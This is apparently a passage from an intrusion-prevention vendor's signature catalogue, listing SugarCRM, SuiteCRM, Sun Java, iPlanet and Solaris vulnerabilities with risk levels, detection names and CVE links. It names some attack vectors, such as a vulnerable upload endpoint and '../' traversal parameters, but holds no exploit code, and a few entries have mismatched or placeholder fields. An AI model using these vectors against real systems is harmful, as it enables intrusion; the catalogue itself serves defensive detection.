This vulnerability occurs due to a lack of appropriate validation when uploading a malicious PNG file with embedded PHP code to the web server using the vulnerable endpoint /index.php?module=EmailTemplates&action=AttachFiles. Once uploaded, depending on server configuration, the attacker can access the malicious PNG file and execute the malicious PHP code and gaining access to the system. Together with a missing authentication check in the loadUser() method in include/MVC/SugarApplication.php, this vulnerability enables any remote attacker, regardless of authentication, to gain access to the underlying operating system as the user that the web services are running as (typically www-data).

Situation:

File-PNG_SugarCRM-EmailTemplates-Validation-Vulnerability-CVE-2023-22952

References:

CVE-2023-22952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22952

SugarCRM-Multiple-Parameters-Directory-Traversal

About this vulnerability:

Multiple directory traversal vulnerabilities in SugarCRM

Risk:

Moderate

First detected in:

sgpkg-ips-19-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SugarCRM Sugar Sales

Type:

Directory Traversal

Description:

SugarCRM Sugar Sales Customer Relationship Management application for Microsoft Windows and Unix-based operating systems has a directory traversal vulnerability which allows remote attackers to read arbitrary files and possibly execute arbitrary PHP code via .. (dot dot) sequences in the (1) module, (2) action, or (3) theme parameters to index.php, (4) the theme parameter to Login.php, and possibly other parameters or scripts.

Situation:

HTTP_CSU-SugarCRM-Multiple-Parameters-Directory-Traversal

References:

CVE-2004-1227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1227

BID-11740
http://www.securityfocus.com/bid/11740

OSVDB-12230
http://www.osvdb.org/12230

SugarCRM-PHP-Unserialize-Vulnerability

About this vulnerability:

A PHP unserialize() vulnerability in SugarCRM.

Risk:

High

First detected in:

sgpkg-ips-660-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SugarCRM

Type:

PHP Injection

Description:

A vulnerability in PHP unserialize() in SugarCRM, 6.3.1 and before, which allows authenticated users to write arbitrary PHP code, and execute code, through the _destruct() method from the SugarTheme class.

Situation:

HTTP_CS-SugarCRM-PHP-Unserialize-Vulnerability

References:

CVE-2012-0694
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0694

OSVDB-83361
http://www.osvdb.org/83361

SugarCRM-Record-Parameter-SQL-Injection

About this vulnerability:

SQL injection vulnerability in SugarCRM

Risk:

Moderate

First detected in:

sgpkg-ips-19-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SugarCRM Sugar Sales

Type:

SQL Injection

Description:

SugarCRM Customer Relationship Management application for Microsoft Windows and Unix-based operating systems is vulnerable to SQL injection. By sending a specially-crafted URL request containing SQL code in the record variable, a remote attacker could obtain sensitive information, and add, modify or delete data in the backend database.

Situation:

HTTP_CSU-SugarCRM-Record-Parameter-SQL-Injection

References:

CVE-2004-1225
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1225

BID-11740
http://www.securityfocus.com/bid/11740

OSVDB-12229
http://www.osvdb.org/12229

SugarCRM-Rest_Data-PHP-Object-Deserialization

About this vulnerability:	A vulnerability in SugarCRM
Risk:	High
First detected in:	sgpkg-ips-809-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	SugarCRM
Type:	Input Validation
Description:	There exists a script injection vulnerability in SugarCRM. A remote attacker can use this to execute PHP code on the affected system.
Situation:	HTTP_CRL-SugarCRM-Rest_Data-PHP-Object-Deserialization

SuiteCRM-Authenticated-SQL-Injection-In-Export-Functionality

About this vulnerability:	A vulnerability in SuiteCRM.
Risk:	High
First detected in:	sgpkg-ips-1507-5242
Last changed:	sgpkg-ips-1507-5242
Platform:	Generic
Software:	SuiteCRM
Type:	SQL Injection
Description:	A vulnerability in SuiteCRM, versions before 7.12.6, which allows remote attackers to to retrieve all the usernames and their associated password from the database, by sending specially crafted requests to the export entry point of the application.
Situation:	HTTP_CS-SuiteCRM-Authenticated-SQL-Injection-In-Export-Functionality

SuiteCRM-Log-File-Remote-Code-Execution

About this vulnerability:

A vulnerability in SuiteCRM.

Risk:

High

First detected in:

sgpkg-ips-1365-5242

Last changed:

sgpkg-ips-1365-5242

Platform:

Linux; Unix

Software:

SuiteCRM

Type:

Input Validation

Description:

A vulnerability in SuiteCRM which allows remote attackers to populate the log file with PHP code and force the log file to be treated as a PHP file resulting in code execution, due to the insufficient validation of the logger_file_ext parameter.

Situation:

HTTP_CS-CSuiteCRM-Log-File-Remote-Code-Execution

References:

CVE-2020-28328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28328

Sumavision-EMR-Arbitrary-User-Creation-CVE-2020-10181

About this vulnerability:

A vulnerability in Sumavision EMR

Risk:

High

First detected in:

sgpkg-ips-1403-5242

Last changed:

sgpkg-ips-1403-5242

Platform:

Generic

Software:

Sumavision

Type:

Input Validation

Description:

A vulnerability in Sumavision Enhanced Multimedia Router may allow unauthenticated attackers to create arbitrary users with admin privileges.

Situation:

HTTP_CRL-Sumavision-EMR-Arbitrary-User-Creation-CVE-2020-10181

References:

CVE-2020-10181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10181

Sun-Iplanet-Admin-Server-Open-Call-Vulnerability

About this vulnerability:

Arbitrary command execution vulnerability in Sun iPlanet

Risk:

Moderate

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

iPlanet

Type:

Malfunction

Description:

The Perl script importInfo in the Admin Server for iPlanet WebServer allows the web administrator to execute arbitrary commands via shell metacharacters in the dir paramater, and possibly allows remote attackers to exploit this vulnerability via a separate XSS issue (CVE-2002-1315).

References:

CVE-2002-1316
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1316

BID-6203
http://www.securityfocus.com/bid/6203

Sun-Iplanet-Admin-Server-XSS

About this vulnerability:

Cross-site scripting vulnerability in Sun iPlanet Admin Server

Risk:

Moderate

First detected in:

sgpkg-ips-176-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

iPlanet

Type:

Cross-site Scripting

Description:

Cross-site scripting (XSS) vulnerability in the Admin Server for iPlanet WebServer allows remote attackers to execute web script or HTML as the iPlanet administrator by injecting the desired script into error logs, and possibly escalating privileges by using the XSS vulnerability in conjunction with another issue (CVE-2002-1316).

Situation:

HTTP_CRL-Iplanet-Web-Admin-Server-Command-Execution

References:

CVE-2002-1315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1315

BID-6202
http://www.securityfocus.com/bid/6202

OSVDB-9220
http://www.osvdb.org/9220

Sun-Java-Calendar-Deserialization-Privilege-Escalation

About this vulnerability:

A security vulnerability in Sun JVM.

Risk:

High

First detected in:

sgpkg-ips-665-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux; Mac OS X

Software:

Sun Java Runtime Environment; Sun Java Development Kit

Type:

Insecure Configuration

Description:

A security vulnerability in Sun Java Runtime Environment and Sun Java Development Kit, versions 5.0 Update 16 and earlier and SDK and JRE 1.4.2_18 and earlier, where the context of ZoneInfo objects during deserialization are not properly enforced, which may allow remote attackers to violate the same-origin policy, obtain sensitive information, bypass security restrictions, run untrusted applets with elevated privileges, and cause denial-of-service conditions.

Situation:

File-Text_Sun-Java-Calendar-Deserialization-Privilege-Escalation

References:

CVE-2008-5353
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5353

BID-32608
http://www.securityfocus.com/bid/32608

OSVDB-50500
http://www.osvdb.org/50500

Sun-Java-JRE-getSoundbank-Buffer-Overflow

About this vulnerability:

A Sun Java JRE getSoundbank Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-782-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Sun Java Runtime Environment

Type:

Buffer Overflow

Description:

A vulnerability in Sun Java Runtime Environment, versions JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier, which allows remote attackers to bypass restrictions, elevate privileges, execute arbitrary code and cause denial of service conditions.

Situation:

File-Text_Sun-Java-JRE-getSoundbank-Buffer-Overflow

References:

CVE-2009-3867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3867

BID-36881
http://www.securityfocus.com/bid/36881

OSVDB-59711
http://www.osvdb.org/59711

Sun-Java-JRE_DNS-Denial-Of-Service

About this vulnerability:

A vulnerability in Sun Microsystems Java Runtime Environment

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Runtime Environment; BEA WebLogic

Type:

Malfunction

Description:

A vulnerability exists in the DNS functionality of the Sun Java Runtime Environment and the Sun Java Development Kit. When a vulnerable application that uses the affected Java class is manipulated into performing many DNS requests, an integer overflow can result. This would lead to a denial of service condition in the DNS client functionality. The behavior of an application using the JRE product depends on how it handles the exception generated by the vulnerable class. Here are some typical scenarios: 1. The application handles the exception as a critical failure. This will likely cause the application to terminate. 2. The application ignores the exception. It continues using the same instance(s) of the vulnerable class. In this case, DNS look-up is non-functional, which may be considered a denial of service condition. This will probably have a negative impact on the application for some period of time. Note that DNS lookup will successfully resume after the next 32768 unsuccessful tries. 3. The application handles the exception. Its exception handling functionality includes creating new instances of the vulnerable class. The application is unaffected by this vulnerability in such a case.

Situation:

DNS-UDP_Sun-Java-JRE-DNS-Denial-Of-Service

References:

CVE-2004-1503
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1503

BID-11619
http://www.securityfocus.com/bid/11619

Sun-Java-Plugin-JavaScript-Security-Restriction-Bypass

About this vulnerability:

A vulnerability in Sun Java Runtime Environment

Risk:

High

First detected in:

sgpkg-ips-108-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Runtime Environment

Type:

Malfunction

Description:

There is a vulnerability in the Sun Java Runtime Environment that allows JavaScript code that assists the applet to bypass the restrictions set by the runtime environment. This may lead to code execution within the context of the current user.

Situation:

HTTP_Sun-Java-Plugin-JavaScript-Security-Restriction-Bypass
File-Text_Sun-Java-Plugin-JavaScript-Security-Restriction-Bypass

References:

CVE-2004-1029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1029

BID-11726
http://www.securityfocus.com/bid/11726

Sun-Java-Runtime-Awt-Setdifflcm-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Sun Microsystems Java Development Kit (JDK)

Risk:

High

First detected in:

sgpkg-ips-429-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Software:

Sun Java Development Kit; Sun Java Runtime Environment

Type:

Input Validation

Description:

There is a buffer overflow vulnerability in Sun's Java Runtime Environment (JRE). Specifically, the vulnerability is due to a flaw that exists in the processing of arguments to the setDiffICM AWT library function. Due to the lack of bounds checking on one of the parameters to the function, a stack buffer overflow can occur. This error may be exploited by remote unauthenticated attackers to execute arbitrary code on the target system in the context of the current user.

Situation:

File-Binary_Sun-Java-Runtime-Environment-Pack200-Decompression-Integer-Overflow

References:

CVE-2009-3869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3869

BID-36881
http://www.securityfocus.com/bid/36881

Sun-Java-Runtime-Environment-Pack200-Decompression-Integer-Overflow

About this vulnerability:

A vulnerability in Sun Microsystems Java Runtime Environment (JRE)

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Runtime Environment; Sun Java Development Kit

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in Sun Java Runtime Environment software. The vulnerability is due to insufficient validation while decompressing Pack200 (jar.pack.gz) files. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted HTML file. Successful exploitation may lead to arbitrary code execution on the target. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the logged in user. In an attack case where code injection is not successful, the affected process will terminate abnormally.

Situation:

References:

CVE-2008-5352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5352

BID-32608
http://www.securityfocus.com/bid/32608

OSVDB-50501
http://www.osvdb.org/50501

Sun-Java-System-Web-Server-Admin-Server-Denial-Of-Service

About this vulnerability:	A vulnerability in Sun Microsystems Java System Web Server
Risk:	Moderate
First detected in:	sgpkg-ips-286-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Sun Java Web Server
Type:	Input Validation
Description:	A denial of service vulnerability exists in Sun Java Web Server Admin Server. The vulnerability is due to insufficient input validation when processing malformed HTTP requests. A remote unauthenticated attacker can leverage this vulnerability by sending a crafted HTTP request to a target Admin Server. In a successful attack scenario the target Admin Server will terminate abnormally, creating a temporary denial of service condition.
Situation:	Generic_CS-Sun-Java-System-Web-Server-Admin-Server-Denial-Of-Service

Sun-Java-System-Web-Server-Digest-Authorization-Buffer-Overflow

About this vulnerability:	A vulnerability in Sun Microsystems Java System Web Proxy Server
Risk:	High
First detected in:	sgpkg-ips-286-4219
Last changed:	sgpkg-ips-1733-5242
Platform:	Generic
Software:	Sun Java Web Proxy Server; Sun Java Web Server
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability exists in Sun Java System Web Server. The vulnerability is due to insufficient boundary checks when processing malformed HTTP requests. A remote unauthenticated attack can leverage this vulnerability by sending a crafted HTTP request to a target server. In an attack scenario where code execution is successful the injected code will be executed within the security context of the target service, which is usually SYSTEM.
Situation:	HTTP_CSH-Sun-Java-System-Web-Server-Digest-Authorization-Buffer-Overflow-2

Sun-Java-Web-Console-Login-Format-String-Vulnerability

About this vulnerability:

Format string vulnerability in Sun Java Web Console libwebconsole_services.so

Risk:

Moderate

First detected in:

sgpkg-ips-155-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris

Software:

Sun Java Web Console

Type:

Format String

Description:

Libwebconsole_services.so in Sun Java Web Console 2.2.2 - 2.2.5 suffers from a format string vulnerability in login handling. The vulnerability allows remote attackers to execute arbitrary code on a vulnerable system.

Situation:

Generic_CS-Sun-Java-Web-Console-Login-Format-String-Vulnerability

References:

CVE-2007-1681
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1681

BID-23539
http://www.securityfocus.com/bid/23539

OSVDB-34902
http://www.osvdb.org/34902

Sun-Java-Web-Server-WebDAV-Stack-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Sun Java Web Server webdav argument handling

Risk:

High

First detected in:

sgpkg-ips-338-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Sun Java Web Server

Type:

Malfunction

Description:

A stack buffer overflow vulnerability exists in Sun Java System Web Server. The vulnerability is due to a boundary error when processing crafted WEBDAV requests. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the security context of the affected process. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the logic of the malicious code. An unsuccessful exploit attempt may abnormally terminate the affected service.

Situation:

HTTP_CRL-Excessively-Long-Proppatch-Request-Argument
HTTP_CRL-Excessively-Long-Propfind-Request-Argument
HTTP_CRL-Excessively-Long-Copy-Request-Argument
HTTP_CRL-Excessively-Long-Options-Request-Argument

References:

CVE-2010-0361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0361

Sun-Java-Web-Start-Double-Quote-Injection

About this vulnerability:

A Sun Java Web Start Double Quote Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-783-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Web Start

Type:

Malfunction

Description:

A vulnerability in the Web Start component of Java Runtime Environment, versions SE 7 Update 7 and earlier, and 6 Update 35 and earlier, which allows remote attackers to execute arbitrary code.

Situation:

File-TextId_Oracle-Java-Web-Start-Argument-Injection-Remote-Code-Execution

References:

CVE-2012-1533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1533

BID-56046
http://www.securityfocus.com/bid/56046

OSVDB-86348
http://www.osvdb.org/86348

Sun-Java-Web-Start-Jnlp-Java-vm-args-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Sun Microsystems Java Web Start

Risk:

High

First detected in:

sgpkg-ips-379-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Web Start; Sun Java Development Kit; Sun Java Runtime Environment; Sun Java 2 Software Development Kit

Type:

Buffer Overflow

Description:

There exists a heap buffer overflow vulnerability in Sun Java Web Start. The vulnerability is due to improper bound checking while handling XML based JNLP files. A remote unauthenticated attacker can exploit this vulnerability by enticing the target user to open a crafted JNLP file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Sun-Java-Web-Start-Jnlp-Java-vm-args-Heap-Buffer-Overflow
File-TextId_Sun-Java-Web-Start-Jnlp-Java-vm-args-Heap-Buffer-Overflow

References:

CVE-2008-3111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3111

BID-30148
http://www.securityfocus.com/bid/30148

Sun-Java-Web-Start-Jnlp-vm-args-Stack-Overflow

About this vulnerability:

A stack buffer overflow vulnerability in Sun Java Web Start

Risk:

High

First detected in:

sgpkg-ips-159-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Sun Java Web Start

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Sun Java Web Start. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to open a crafted JNLP file, terminating the affected application or causing arbitrary code to be executed with the privileges of the currently logged in user.

Situation:

HTTP_SS-Sun-Java-Web-Start-Jnlp-vm-args-Stack-Overflow
File-TextId_Sun-Java-Web-Start-Jnlp-vm-args-Stack-Overflow

References:

CVE-2008-3111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3111

BID-30148
http://www.securityfocus.com/bid/30148

OSVDB-46959
http://www.osvdb.org/46959

Sun-Java-Web-Start-Launch-Command-Line-Injection

About this vulnerability:	A command-line injection vulnerability in Sun Java Web Start
Risk:	High
First detected in:	sgpkg-ips-301-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	Sun Java Runtime Environment
Type:	Malfunction
Description:	There is a command-line injection vulnerability in Sun Java Web Start. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted web page to break out of the Java security sandbox and execute arbitrary Java code on the vulnerable host.
Situation:	HTTP_SS-Sun-Java-Web-Start-Launch-Command-Line-Injection File-Text_Sun-Java-Web-Start-Launch-Command-Line-Injection

Sun-Java-Web-Start-Plugin-Argument-Injection

About this vulnerability:

A Sun Java Web Start Plugin Argument Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-730-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Web Start

Type:

Input Validation

Description:

A vulnerability in Sun Java Web Start Plugin, in multiple update versions in Java 6, allows remote attackers to execute arbitrary code when passing -J or -XXaltjvm arguments to javaws.exe, which is processed by the launch method.

Situation:

File-Text_Sun-Java-Web-Start-Plugin-Argument-Injection

References:

CVE-2010-0886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886

BID-39346
http://www.securityfocus.com/bid/39346

OSVDB-63648
http://www.osvdb.org/63648

Sun-Java-Web-Start-Splashscreen-Gif-Decoding-Buffer-Overflow

About this vulnerability:

A vulnerability in Sun Microsystems JDK

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Java Development Kit; Sun Java Runtime Environment

Type:

Buffer Overflow

Description:

There exists a memory corruption vulnerability in Sun Microsystems' Java Web Start. The flaw is due to a boundary error when displaying a customized splashscreen GIF image. A remote attacker may exploit this vulnerability by enticing the target user to visit a malicious web page. Successful attack may allow for arbitrary code injection and execution with privileges of the target user. In an attack case where code injection is not successful, the Java Web Start application will terminate unexpectedly. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. In such a case, the injected code will be executed within the context of the currently logged in user.

Situation:

File-GIF_Sun-Java-Web-Start-Splashscreen-Gif-Decoding-Buffer-Overflow

References:

CVE-2008-2086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2086

BID-32608
http://www.securityfocus.com/bid/32608

OSVDB-50510
http://www.osvdb.org/50510

Sun-Java-Web-Start-Splashscreen-PNG-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in Sun Microsystems Java Development Kit (JDK)

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1841-5242

Platform:

Generic

Software:

Sun Java Development Kit; Sun Java Runtime Environment

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability exists in Sun Microsystems' Java Web Start (JWS). The flaw is due to a boundary error when displaying a customized splash screen PNG image. A remote attacker may exploit this vulnerability by enticing the target user to visit a malicious web page. Successful attack can allow for arbitrary code injection and execution with the privileges of the target user. In an attack case where code injection is not successful, the Java Web Start application will terminate unexpectedly. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. In such a case, the injected code will be executed within the context of the currently logged in user.

Situation:

File-PNG_PNG-Image-With-Excessively-Large-Height-Or-Width-Value

References:

CVE-2009-1097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1097

BID-34240
http://www.securityfocus.com/bid/34240

Sun-Java-WebDAV-Propfind-Format-String-Vulnerability

About this vulnerability:

Attempt to exploit format string vulnerability in Sun Java Webdav

Risk:

High

First detected in:

sgpkg-ips-338-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Sun Java Web Server

Type:

Malfunction

Description:

There is a format string vulnerability in the WebDAV implementation in webservd in Sun Java System Web Server 7.0 Update 6 that allows remote attackers to cause a denial of service and possibly execute arbitrary code via format string specifiers in the encoding attribute of the XML declaration in a PROPFIND request.

Situation:

HTTP_CS-Sun-Java-Web-Server-WebDAV-Format-String-Vulnerability

References:

CVE-2010-0388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0388

BID-37910
http://www.securityfocus.com/bid/37910

Sun-JDK-Image-Parsing-Library-ICC-Buffer-Overflow

About this vulnerability:

A vulnerability in Sun JDK

Risk:

High

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Sun Java Development Kit

Type:

Buffer Overflow

Description:

An integer overflow vulnerability exists in the way Sun JDK image parser handles JPG files. The vulnerability is due to improper checking of the ICC profile data when parsing JPG files. A remote attacker may leverage this vulnerability to inject and execute arbitrary code on the target host, in the context of the currently logged in user.

Situation:

File-JPEG_Sun-JDK-Image-Parsing-Library-ICC-Buffer-Overflow

References:

CVE-2007-2788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2788

BID-24004
http://www.securityfocus.com/bid/24004

Sun-JRE-Pack200-Decompression-Integer-Overflow

About this vulnerability:

A vulnerability in Sun Microsystems Java Development Kit (JDK)

Risk:

Moderate

First detected in:

sgpkg-ips-973-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Development Kit; Sun Java Runtime Environment

Type:

Integer Overflow

Description:

There exists a vulnerability in Sun Java Runtime Environment software. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Sun-JRE-Pack200-Decompression-Integer-Overflow

References:

CVE-2009-1095
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1095

BID-34240
http://www.securityfocus.com/bid/34240

Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Sun Microsystems' JRE

Risk:

High

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Runtime Environment

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Sun Microsystems' Java Runtime Environment (JRE). The vulnerability is caused by improper checking of the image width when parsing GIF files. A remote attacker may leverage this vulnerability to inject and execute arbitrary code on the target host, in the context of the currently logged in user.

Situation:

HTTP_Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption
File-Binary_Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption
File-GIF_Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption

References:

CVE-2007-0243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0243

BID-22085
http://www.securityfocus.com/bid/22085

OSVDB-32834
http://www.osvdb.org/32834

Sun-Microsystems-Java-System-Web-Proxy-Sockd-Daemon-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Sun Microsystems Java System Web Proxy Server

Risk:

High

First detected in:

sgpkg-ips-109-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Web Proxy Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Java System Web Proxy sockd daemon. The vulnerability is due to a lack of boundary checking on user-provided parameters when parsing the message received during protocol negotiation. A remote unauthenticated attacker may leverage this vulnerability by sending a specially crafted connection request. Successful exploitation allows injection and execution of arbitrary code with System/root privileges.

Situation:

Generic_Sun-Microsystems-Java-System-Web-Proxy-Sockd-Daemon-Buffer-Overflow

References:

CVE-2007-2881
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2881

BID-24165
http://www.securityfocus.com/bid/24165

OSVDB-35841
http://www.osvdb.org/35841

Sun-Microsystems-JRE-Isinstalled.dnsresolve-Function-Memory-Exception

About this vulnerability:

A vulnerability in Sun Microsystems Java Web Start

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Web Start; Sun Java Development Kit; Sun Java Runtime Environment

Type:

Malfunction

Description:

There exists a design weakness vulnerability in the way Sun Java Web Start ActiveX control handles user supplied data.

Situation:

HTTP_SS-Sun-Microsystems-JRE-Isinstalled.dnsresolve-Function-Memory-Exception
File-Text_Sun-Microsystems-JRE-Isinstalled.dnsresolve-Function-Memory-Exception

References:

BID-25734
http://www.securityfocus.com/bid/25734

Sun-Mysql-Database-Select-Subquery-Denial-Of-Service

About this vulnerability:	A vulnerability in Sun Microsystems MySQL
Risk:	High
First detected in:	sgpkg-ips-375-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	MySQL
Type:	Input Validation
Description:	A denial of service vulnerability has been reported in MySQL database server. The vulnerability is due to an input validation error while parsing a specially crafted SELECT query with a sub-query in the WHERE clause. Remote authenticated users can exploit this vulnerability to cause a denial of service condition. Successful exploitation would cause the database service to terminate abnormally.
Situation:	MySQL_Sun-Mysql-Database-Select-Subquery-Denial-Of-Service

Sun-One-Iplanet-Chunked-Enconding-BOF

About this vulnerability:

Buffer overflow in Sun ONE / iPlanet Web Server

Risk:

High

First detected in:

sgpkg-ips-14-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun ONE Web Server; iPlanet

Type:

Buffer Overflow

Description:

Sun ONE Web server (formerly iPlanet Web Server) is vulnerable to a buffer overflow in the function that handles chunked transfer encoding. By sending a specially-crafted GET request that uses chunked transfer encoding to a vulnerable Web server a remote attacker could overflow a buffer and cause the Web server to crash or execute code on the server.

Situation:

HTTP_CS-Sun-One-Iplanet-Chunked-Encoding-BOF

References:

CVE-2002-0845
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0845

BID-5433
http://www.securityfocus.com/bid/5433

OSVDB-5070
http://www.osvdb.org/5070

Sun-One-Iplanet-Search-Component-File-Disclosure

About this vulnerability:

File disclosure vulnerability in Sun One and iPlanet HTTP servers

Risk:

Moderate

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun ONE Web Server; iPlanet

Type:

Malfunction

Description:

Sun iPlanet and One HTTP servers contain a flaw that allows a remote attacker to access arbitrary files outside of the web path. The issue is due to the "search" script not properly sanitizing user input. A remote attacker could create a specially crafted HTTP request with traversal style attack (../../) supplied via the "NS-query-pat" variable.

Situation:

HTTP_CSU-Sun-One-Iplanet-Search-Component-File-Disclosure

References:

CVE-2002-1042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1042

BID-5191
http://www.securityfocus.com/bid/5191

OSVDB-846
http://www.osvdb.org/846

Sun-Solaris-DHCP-Client-Arbitrary-Code-Execution

About this vulnerability:

A vulnerability in Sun Solaris

Risk:

High

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris

Software:

<os>

Type:

Code Injection

Description:

There is a command execution vulnerability in the DHCP client application shipped with Solaris. The vulnerability is caused by improper sanitization of data supplied in DHCP reply messages. A remote attacker with access to the target's local network can exploit the vulnerability by sending malicious DHCP replies to the target. Exploiting this flaw allows an attacker to execute arbitrary commands within the privileges of the root user.

Situation:

Generic_UDP-Sun-Solaris-DHCP-Client-Arbitrary-Code-Execution
BOOTP_CS-Sun-Solaris-DHCP-Client-Arbitrary-Code-Execution

References:

CVE-2005-2870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2870

BID-14687
http://www.securityfocus.com/bid/14687

Sun-Solaris-Lpd-Remote-Command-Execution

About this vulnerability:

Arbitrary command execution vulnerability in Sun Solaris LPD

Risk:

Moderate

First detected in:

sgpkg-ips-122-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris

Software:

<os>

Type:

Malfunction

Description:

Certain versions of Sun Solaris LPD suffer from a command execution vulnerability. The vulnerability allows remote attackers to execute arbitrary commands on vulnerable systems with the print protocol daemon LPD running.

Situation:

Printer_CS-Sun-Solaris-Lpd-Remote-Command-Execution

References:

CVE-2001-1583
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1583

BID-3274
